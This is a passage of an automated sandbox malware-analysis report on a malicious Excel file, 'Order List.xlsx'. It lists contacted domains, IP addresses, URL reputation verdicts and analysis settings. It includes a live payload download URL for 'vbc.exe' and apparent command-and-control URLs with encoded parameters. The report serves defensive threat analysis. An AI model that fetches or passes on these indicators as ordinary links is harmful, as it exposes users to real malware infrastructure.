          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.teelinkz.com/o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng==0%Avira URL Cloudsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.natcandy.com/o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w==0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://198.23.212.188/reg/vbc.exe100%Avira URL Cloudmalware
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://www.alloutdoorspeaker.com/o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://www.pornfilm3d.com/o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA==0%Avira URL Cloudsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          teelinkz.com
          34.102.136.180
          truetrueunknown
          alloutdoorspeaker.com
          137.59.52.234
          truetrueunknown
          crimson.school
          34.102.136.180
          truetrue
            unknown
            parkingpage.namecheap.com
            198.54.117.216
            truefalse
              high
              www.pornfilm3d.com
              104.24.122.89
              truetrueunknown
              californiapropiedades.com
              67.227.214.78
              truetrue
                unknown
                www.the-trinity-project.com
                185.119.173.57
                truetrue
                  unknown
                  www.tnicholson.design
                  65.254.250.119
                  truefalse
                    unknown
                    www.natcandy.com
                    unknown
                    unknowntrue
                      unknown
                      www.nanox.ltd
                      unknown
                      unknowntrue
                        unknown
                        www.alloutdoorspeaker.com
                        unknown
                        unknowntrue
                          unknown
                          www.teelinkz.com
                          unknown
                          unknowntrue
                            unknown
                            www.heritagediscovery.info
                            unknown
                            unknowntrue
                              unknown
                              www.crimson.school
                              unknown
                              unknowntrue
                                unknown
                                www.californiapropiedades.com
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.teelinkz.com/o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng==true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.natcandy.com/o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w==true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://198.23.212.188/reg/vbc.exetrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.alloutdoorspeaker.com/o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0Jtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.pornfilm3d.com/o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA==true
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://search.ebay.de/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.mtv.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.rambler.ru/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://buscar.ya.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://asp.usatoday.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://rover.ebay.comexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://search.ebay.in/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://%s.comexplorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                low
                                                                http://msk.afisha.ru/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.rediff.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://search.naver.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.google.ru/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://search.daum.net/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://buscar.ozu.es/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.about.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.ask.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.cjmall.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://search.centrum.cz/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://suche.t-online.de/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.google.it/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://search.auction.co.kr/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.ceneo.pl/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.amazon.de/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000002.2347379246.0000000000260000.00000004.00000020.sdmpfalse
                                                                                                          high
                                                                                                          http://sads.myspace.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://search.sify.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://search.ebay.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://search.nifty.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://www.google.si/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.google.cz/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.soso.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.univision.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.ebay.it/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://busca.orange.es/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.target.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://buscador.terra.es/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.iask.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.tesco.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.interpark.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://investor.msn.com/explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.espn.go.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown

                                                                                                                                                                Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                137.59.52.234
                                                                                                                                                                unknownIndia
                                                                                                                                                                133694EMAXGLOBAL-ASEMAXGLOBALMEDIAPVTLTDINtrue
                                                                                                                                                                67.227.214.78
                                                                                                                                                                unknownUnited States
                                                                                                                                                                32244LIQUIDWEBUStrue
                                                                                                                                                                198.23.212.188
                                                                                                                                                                unknownUnited States
                                                                                                                                                                36352AS-COLOCROSSINGUStrue
                                                                                                                                                                34.102.136.180
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUStrue
                                                                                                                                                                104.24.122.89
                                                                                                                                                                unknownUnited States
                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                185.119.173.57
                                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                                198047UKWEB-EQXGBtrue
                                                                                                                                                                198.54.117.216
                                                                                                                                                                unknownUnited States
                                                                                                                                                                22612NAMECHEAP-NETUSfalse

                                                                                                                                                                Private

                                                                                                                                                                IP
                                                                                                                                                                192.168.2.255

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                Analysis ID:321137
                                                                                                                                                                Start date:20.11.2020
                                                                                                                                                                Start time:12:04:08
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 9m 23s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:light
                                                                                                                                                                Sample file name:Order List.xlsx
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@9/6@10/8
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 42.2% (good quality ratio 40%)
                                                                                                                                                                • Quality average: 75.5%
                                                                                                                                                                • Quality standard deviation: 28.6%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                Show All
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
